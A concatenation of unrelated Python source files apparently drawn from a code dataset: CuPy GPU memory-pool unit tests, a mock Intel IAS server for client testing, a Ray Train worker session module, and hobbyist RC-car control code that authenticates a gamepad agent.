a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
self.assertEqual(a_cpu.value, 1)
a_gpu += 1
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ptr = self.stream.ptr
def test_round_size(self):
self.assertEqual(memory._round_size(self.unit - 1), self.unit)
self.assertEqual(memory._round_size(self.unit), self.unit)
self.assertEqual(memory._round_size(self.unit + 1), self.unit * 2)
def test_bin_index_from_size(self):
self.assertEqual(memory._bin_index_from_size(self.unit - 1), 0)
self.assertEqual(memory._bin_index_from_size(self.unit), 0)
self.assertEqual(memory._bin_index_from_size(self.unit + 1), 1)
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
tail = chunk.split(self.unit * 2)
self.assertEqual(chunk.ptr(), mem.ptr)
self.assertEqual(chunk.offset, 0)
self.assertEqual(chunk.size, self.unit * 2)
self.assertEqual(chunk.prev, None)
self.assertEqual(chunk.next.ptr(), tail.ptr())
self.assertEqual(chunk.stream_ptr, self.stream_ptr)
self.assertEqual(tail.ptr(), mem.ptr + self.unit * 2)
self.assertEqual(tail.offset, self.unit * 2)
self.assertEqual(tail.size, self.unit * 2)
self.assertEqual(tail.prev.ptr(), chunk.ptr())
self.assertEqual(tail.next, None)
self.assertEqual(tail.stream_ptr, self.stream_ptr)
tail_of_head = chunk.split(self.unit)
self.assertEqual(chunk.ptr(), mem.ptr)
self.assertEqual(chunk.offset, 0)
self.assertEqual(chunk.size, self.unit)
self.assertEqual(chunk.prev, None)
self.assertEqual(chunk.next.ptr(), tail_of_head.ptr())
self.assertEqual(chunk.stream_ptr, self.stream_ptr)
self.assertEqual(tail_of_head.ptr(), mem.ptr + self.unit)
self.assertEqual(tail_of_head.offset, self.unit)
self.assertEqual(tail_of_head.size, self.unit)
self.assertEqual(tail_of_head.prev.ptr(), chunk.ptr())
self.assertEqual(tail_of_head.next.ptr(), tail.ptr())
self.assertEqual(tail_of_head.stream_ptr, self.stream_ptr)
tail_of_tail = tail.split(self.unit)
self.assertEqual(tail.ptr(), chunk.ptr() + self.unit * 2)
self.assertEqual(tail.offset, self.unit * 2)
self.assertEqual(tail.size, self.unit)
self.assertEqual(tail.prev.ptr(), tail_of_head.ptr())
self.assertEqual(tail.next.ptr(), tail_of_tail.ptr())
self.assertEqual(tail.stream_ptr, self.stream_ptr)
self.assertEqual(tail_of_tail.ptr(), mem.ptr + self.unit * 3)
self.assertEqual(tail_of_tail.offset, self.unit * 3)
self.assertEqual(tail_of_tail.size, self.unit)
self.assertEqual(tail_of_tail.prev.ptr(), tail.ptr())
self.assertEqual(tail_of_tail.next, None)
self.assertEqual(tail_of_tail.stream_ptr, self.stream_ptr)
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
self.assertEqual(head.ptr(), head_ptr)
self.assertEqual(head.offset, head_offset)
self.assertEqual(head.size, head_size)
self.assertEqual(head.prev, None)
self.assertEqual(head.next.ptr(), tail_ptr)
self.assertEqual(head.stream_ptr, self.stream_ptr)
tail.merge(tail_of_tail)
self.assertEqual(tail.ptr(), tail_ptr)
self.assertEqual(tail.offset, tail_offset)
self.assertEqual(tail.size, tail_size)
self.assertEqual(tail.prev.ptr(), head_ptr)
self.assertEqual(tail.next, None)
self.assertEqual(tail.stream_ptr, self.stream_ptr)
head.merge(tail)
self.assertEqual(head.ptr(), chunk_ptr)
self.assertEqual(head.offset, chunk_offset)
self.assertEqual(head.size, chunk_size)
self.assertEqual(head.prev, None)
self.assertEqual(head.next, None)
self.assertEqual(head.stream_ptr, self.stream_ptr)
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
self.assertNotEqual(p1.ptr, p2.ptr)
self.assertNotEqual(p1.ptr, p3.ptr)
self.assertNotEqual(p2.ptr, p3.ptr)
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
self.assertEqual(ptr + self.unit * 2, tail.ptr)
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr1, p2.ptr)
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
del tail
del head
p = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr, p.ptr)
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
del head
del tail
p = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr, p.ptr)
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
self.assertNotEqual(ptr1, p2.ptr)
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
del p2
def test_free_all_blocks_split(self):
# do not free splitted blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
self.assertEqual(tailptr, p.ptr)
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p3.ptr)
self.assertNotEqual(ptr2, p3.ptr)
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p4.ptr)
self.assertEqual(ptr2, p4.ptr)
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p3.ptr)
self.assertNotEqual(ptr2, p3.ptr)
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p4.ptr)
self.assertNotEqual(ptr2, p4.ptr)
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.used_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 6, self.pool.used_bytes())
del p2
self.assertEqual(self.unit * 2, self.pool.used_bytes())
del p1
self.assertEqual(self.unit * 0, self.pool.used_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 1, self.pool.used_bytes())
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.used_bytes())
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 0, self.pool.free_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 0, self.pool.free_bytes())
del p2
self.assertEqual(self.unit * 4, self.pool.free_bytes())
del p1
self.assertEqual(self.unit * 6, self.pool.free_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 5, self.pool.free_bytes())
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 4, self.pool.free_bytes())
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.total_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p1
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p2
self.assertEqual(self.unit * 6, self.pool.total_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
self.assertEqual(
self.pool.used_bytes() + self.pool.free_bytes(),
self.pool.total_bytes())
del p3
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p2
def test_get_limit(self):
# limit is disabled by default
self.assertEqual(0, self.pool.get_limit())
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
self.assertEqual(1024, self.pool.get_limit())
self.pool.set_limit(size=2**33)
self.assertEqual(2**33, self.pool.get_limit())
self.pool.set_limit(size=0)
self.assertEqual(0, self.pool.get_limit())
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
self.assertEqual(0, self.pool.get_limit())
self.pool.set_limit(fraction=0.5)
self.assertEqual(total * 0.5, self.pool.get_limit())
self.pool.set_limit(fraction=1.0)
self.assertEqual(total, self.pool.get_limit())
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
def test_parse_limit_string(self):
parse_limit_string = self.pool._parse_limit_string
# size
param = parse_limit_string('0')
self.assertEqual(0, param['size'])
self.assertEqual(None, param['fraction'])
param = parse_limit_string('1073741824')
self.assertEqual(1073741824, param['size'])
self.assertEqual(None, param['fraction'])
# fraction
param = parse_limit_string('0%')
self.assertEqual(None, param['size'])
self.assertEqual(0.0, param['fraction'])
param = parse_limit_string('40%')
self.assertEqual(None, param['size'])
self.assertEqual(0.4, param['fraction'])
param = parse_limit_string('70.5%')
self.assertEqual(None, param['size'])
self.assertEqual(0.705, param['fraction'])
param = parse_limit_string('100%')
self.assertEqual(None, param['size'])
self.assertEqual(1.0, param['fraction'])
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool(self.allocator)
def test_zero_size_alloc(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(0).mem
self.assertIsInstance(mem, memory.Memory)
self.assertNotIsInstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
self.assertIsInstance(mem, memory.BaseMemory)
self.assertIsInstance(mem, memory.PooledMemory)
self.assertEqual(self.pool.n_free_blocks(), 0)
mem.free()
self.assertEqual(self.pool.n_free_blocks(), 1)
self.pool.free_all_blocks()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
self.pool.free_all_blocks()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
self.assertIsInstance(mem, memory.BaseMemory)
self.assertIsInstance(mem, memory.PooledMemory)
self.assertEqual(self.pool.n_free_blocks(), 0)
mem.free()
self.assertEqual(self.pool.n_free_blocks(), 1)
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc/free_all_free.
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_used_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.used_bytes())
def test_free_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.free_bytes())
def test_total_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.total_bytes())
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
memory.set_allocator()
self.pool.free_all_blocks()
def test_set_allocator(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.used_bytes())
arr = cupy.arange(128, dtype=cupy.int64)
self.assertEqual(1024, arr.data.mem.size)
self.assertEqual(1024, self.pool.used_bytes())
@unittest.skipUnless(sys.version_info[0] >= 3,
'Only for Python3 or higher')
def test_reuse_between_thread(self):
def job(self):
cupy.arange(16)
self._error = False
# Run in main thread.
self._error = True
job(self)
self.assertFalse(self._error)
# Run in sub thread.
self._error = True
with cupy.cuda.Device(0):
t = threading.Thread(target=job, args=(self,))
t.daemon = True
t.start()
t.join()
self.assertFalse(self._error)
@testing.gpu
class TestAllocatorDefault(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device(0):
arr = cupy.arange(128, dtype=cupy.int64)
self.assertEqual(0, self.pool.used_bytes() - used_bytes)
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
|
mock_ias_server.py | # Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
Mock IAS server for testing IAS client
"""
import http.server
import threading
import time
import queue
def create(endpoint):
mis = MockIasServer(endpoint)
handlers = {
"up": MockIasStateUp,
"error": MockIasStateError,
"slow": MockIasStateSlow,
"down": MockIasStateDown,
}
for state, handler in handlers.items():
mis.add_state(state, handler)
return mis
class TestHTTPServer(http.server.HTTPServer):
def __init__(self, server_address, RequestHandlerClass):
super().__init__(server_address, RequestHandlerClass)
self.requests = queue.Queue()
class MockIasServer:
"""
Use the State pattern to mock different statuses of the IAS server for
testing.
"""
def __init__(self, endpoint):
if endpoint[:len("http://")] != "http://":
raise ValueError("Invalid endpoint: " + endpoint)
host, port = endpoint[len("http://"):].split(":")
self._address = (host, int(port))
self._handlers = {}
self._server = None
self._thread = None
self._requests = []
def start(self, state):
handler = self._handlers[state]
self._server = TestHTTPServer(self._address, handler)
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.start()
def stop(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def restart(self, state):
self.stop()
self.start(state)
def add_state(self, state, handler):
self._handlers[state] = handler
def get_received(self):
return self._server.requests.get()
class MockIasStateUp(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
self.server.requests.put({
"path": self.path,
"command": self.command,
"headers": self.headers,
})
self.send_response(200)
self.end_headers()
self.request.sendall(b"thisisasignaturelist")
# pylint: disable=invalid-name
def do_POST(self):
self.server.requests.put({
"path": self.path,
"command": self.command,
"headers": self.headers,
"data": self.rfile.read(int(self.headers.get("content-length"))),
})
self.send_response(200)
self.send_header("x-iasreport-signature", "signature")
self.end_headers()
self.request.sendall(b'{"thisisa":"verification_report"}')
class MockIasStateError(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
self.send_error(503, message="FUBAR")
# pylint: disable=invalid-name
def do_POST(self):
self.send_error(503, message="FUBAR")
class MockIasStateSlow(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
time.sleep(1)
# pylint: disable=invalid-name
def do_POST(self):
time.sleep(1)
class MockIasStateDown(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
pass
# pylint: disable=invalid-name
def do_POST(self):
pass
|
session.py | import os
import platform
import queue
import threading
import time
from datetime import datetime
from dataclasses import dataclass
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict, Type, Union
import ray
from ray.data import Dataset, DatasetPipeline
from ray.train._internal.accelerator import Accelerator
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS,
TIME_THIS_ITER_S,
PID,
TIMESTAMP,
TIME_TOTAL_S,
NODE_IP,
TRAINING_ITERATION,
HOSTNAME,
DATE,
RESULT_FETCH_TIMEOUT,
)
from ray.train._internal.utils import PropagatingThread
from ray.train.error import SessionMisuseError
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
@dataclass
class TrainingResult:
type: TrainingResultType
data: Dict
class Session:
"""Holds information for training on each worker."""
def __init__(
self,
training_func: Callable,
world_rank: int,
local_rank: int,
world_size: int,
dataset_shard: Optional[Union[Dataset, DatasetPipeline]] = None,
checkpoint: Optional[Dict] = None,
encode_data_fn: Callable = None,
detailed_autofilled_metrics: bool = False,
):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.world_size = world_size
self.loaded_checkpoint = checkpoint
# Function to encode checkpoint dict before sending to the driver.
if not encode_data_fn:
def noop(x):
return x
encode_data_fn = noop
self._encode_data_fn = encode_data_fn
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
self.accelerator = None
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets the next ``TrainingResult`` from the result queue.
If the result queue is empty, then this function returns ``None``.
"""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(
block=False, timeout=RESULT_FETCH_TIMEOUT
)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration,
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._encode_data_fn(self._auto_fill_metrics(kwargs))
result = TrainingResult(TrainingResultType.REPORT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def _auto_fill_checkpoint_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_datetime = datetime.now()
auto_filled_metrics = {
TIMESTAMP: int(time.mktime(current_datetime.timetuple()))
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
else:
kwargs = self._encode_data_fn(self._auto_fill_checkpoint_metrics(kwargs))
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError(
"A Train session is already in use. Do not call "
"`init_session()` manually."
)
_session = Session(*args, **kwargs)
def get_session() -> Optional[Session]:
global _session
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
def _raise_accelerator_session_misuse():
"""Raises a SessionMisuseError because a utility function was used improperly."""
raise SessionMisuseError(
"prepare/accelerate utility functions should be called inside a training "
"function executed by `Trainer.run`"
)
def get_accelerator(default_accelerator_cls: Type[Accelerator]) -> Accelerator:
"""The accelerator for this training session.
If an accelerator has not been set, then this method will construct an
accelerator using the provided accelerator class.
Raises:
SessionMisuseError: if the session is uninitialized.
"""
session = get_session()
if session is None:
_raise_accelerator_session_misuse()
if session.accelerator is None:
session.accelerator = default_accelerator_cls()
return session.accelerator
def set_accelerator(accelerator: Accelerator) -> None:
"""Sets the accelerator for this training session.
Args:
accelerator: The accelerator to use for training.
Raises:
SessionMisuseError: if the session is unitialized.
RuntimeError: if the accelerator has already been set.
"""
session = get_session()
if session is None:
_raise_accelerator_session_misuse()
if session.accelerator is not None:
raise RuntimeError("Cannot change accelerator once set.")
session.accelerator = accelerator
|
rc_software.py | from multiprocessing import Process, Queue
from json import dumps, loads
from threading import Thread
from controller import Controller
from lan_agent import LAN_Agent
from bluetooth_agent import BluetoothAgent
from ds4_agent import DS4Agent
from agent_base import AgentBase
from hashlib import sha256
from utils.constants import SUCCESS, AUTHENTICATION_FAILURE, AGENT_CONNECTED
from sys import argv
from time import sleep
class RC_Car:
"""
The entrypoint of the software for the RC car created like this: TODO: link
By default it will listen on an available port in a range 8000, 60000
:examples:
>>> car = RC_Car()
>>> car.run()
"""
def __init__(self):
"""
Creates the instance of the RC_Car class.
* Starts to listen, on a free port in range 8000, 60000,
* If a connection request received it establishes the connection with the client.
* Creates the instance of the controller class
:Assumptions:
* Only one instance of the class is created
"""
self.agent: AgentBase = None
self.agent_queue: "Queue[AgentBase]" = Queue()
self.poll_processes = dict()
password = "69420" # TODO: get password from file
self.password = sha256(password.encode()).digest()
# self.poll_processes[str(LAN_Agent)] = Process(target=LAN_Agent.poll, args=(self.agent_queue,))
self.poll_processes[str(DS4Agent)] = Process(target=DS4Agent.poll, args=(self.agent_queue,))
# self.poll_processes[str(LAN_Agent)].start()
self.poll_processes[str(DS4Agent)].start()
while not self.agent:
print('before get')
candidate_agent = self.agent_queue.get()
print('after get')
if candidate_agent.authenticate(self.password):
self.agent = candidate_agent
self.controller = Controller()
self.is_connection_alive = True
for process in self.poll_processes.values():
process.terminate()
else:
candidate_agent.close_connection()
self.poll_processes[str(candidate_agent)] = Process(target=type(candidate_agent).poll, args=(self.agent_queue,))
self.poll_processes[str(candidate_agent)].start()
def run(self) -> None:
"""
* Starts the thread which sends updates on the state of the controller
* Starts the method which is responsible for receiving the commands from the client.
Note: It blocks until the the client ends connection.
:return: None
"""
update_thread = Thread(target=self.send_updates)
update_thread.start()
self.receive_commands()
update_thread.join()
def receive_commands(self) -> None:
"""
Listens on the receiving socket in an infinite loop.
:Assumpitons: None
:return: None
"""
while True:
data = self.agent.receive()
if not data:
self.is_connection_alive = False
break
else:
self.controller.set_values(loads(data))
def send_updates(self) -> None:
"""
Constantly update the client about the state of the controller
:Assumpitons: None
:return: None
"""
while self.is_connection_alive:
message = dumps(self.controller.get_values()) + '\n'
self.agent.send(message)
sleep(0.05) # distance sensor
if __name__ == '__main__':
if len(argv) > 1 and argv[1] == '--debug':
b = DS4Agent()
else:
RC_Car().run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.